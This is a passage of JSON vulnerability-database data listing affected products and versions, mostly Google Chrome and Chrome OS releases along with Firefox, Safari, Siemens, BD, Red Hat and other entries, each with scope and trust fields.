        "version": "11.0.696.14"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.36"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.12"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1006"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.811.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.17"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.34"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.499.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.14"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.106"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.36"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.709.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.43"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.96"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.54"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.882.0"
      },
      {
        "model": "alaris systems manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.68"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1002.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.35"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "60.0.3112.78"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.384.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.59"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.29"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.63"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.111"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.408.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.118"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.19"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "2.0.157.2"
      },
      {
        "model": "simatic hmi ktp mobile panels",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.44"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.134"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.721.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.74"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.23"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "1.0.154.61"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.46"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.36"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.68"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.76"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.113"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.529.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.54"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.503.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.563.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.88"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.750.0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "17.0.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.24"
      },
      {
        "model": "chrome beta",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "3.0.193.2"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.40"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.771.0"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "7.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.603.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.59"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.43"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "44.0.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.408.8"
      },
      {
        "model": "enterprise linux for power little endian extended update supp",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-7.4"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.0.18"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.906.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.24"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.35"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "2.0.169.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.114"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "6.0.1"
      },
      {
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-7.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.202"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.86"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.363.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.60"
      },
      {
        "model": "simatic ipc547e",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1306.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.601.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.223.0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.0.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "3.0.195.36"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.36"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.52"
      },
      {
        "model": "panel designer",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.812.0"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "5.31"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.944.0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "57.0.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.635.0"
      },
      {
        "model": "simatic s7-1518f-4 pn/dp odk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.35"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.89"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.96"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "48.0.2564.116"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1660.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.21"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1047.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1036.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.44"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.37"
      },
      {
        "model": "vsphere integrated containers",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "1.3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "6.0.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.473.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.441.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1012.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1040"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1037.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "40.0.2214.115"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "32.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.104"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.61"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.47"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.53"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "5.0.3"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.41"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.426.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.752.0"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "1.2.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.43"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "5.33"
      },
      {
        "model": "nexus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5x"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.834.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.327.0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.0.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1654.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.94"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.112"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.49"
      },
      {
        "model": "aix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.15"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.401.1"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "10.0.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.112"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.6.22"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.0.9"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.493.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.216"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.49"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.103"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "64.0.3282.144"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "59.0.3071.92"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.327"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "3.2.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.186"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.956.0"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "5.1.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1662.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.49"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.40"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.9"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1183.0"
      },
      {
        "model": "sinumerik tcu",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "30.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.92"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.217"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "0.6.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.18"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.2491036"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.56"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.108"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.7"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "45.0.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.522.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "49.0.2623.87"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.30"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.29"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.38"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.48"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.23"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.5"
      },
      {
        "model": "sinumerik d sl ncu720.3b",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "840"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.94"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.17"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1305.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.12"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.79"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "61.0.3163.100"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.35"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.30"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.22"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.622.1"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "5.0.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.91"
      },
      {
        "model": "fusion",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "8.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.15"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.159"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.25"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1062.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.2.152.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.556.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.12"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.53"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.450.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.119"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.161"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.772.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.322.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.125"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "48"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1059.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.29"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.398.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.32"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.404.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.140"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.531.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "47.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.82"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.53"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.33"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.321"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.94"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.45"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "54"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.41"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.870.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1006.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.91"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "30"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1653.1"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "28.0"
      },
      {
        "model": "pyxis anesthesia es",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.66"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.204"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.58"
      },
      {
        "model": "enterprise linux for power little endian extended update supp",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-7.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.551.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.18"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1083.0"
      },
      {
        "model": "windows for x64-based systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "8.10"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.152"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "62.0.3202.89"
      },
      {
        "model": "aix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.301"
      },
      {
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-7.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.335"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.695.0"
      },
      {
        "model": "windows for 32-bit systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "8.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.39"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "6.2.6"
      },
      {
        "model": "chrome",
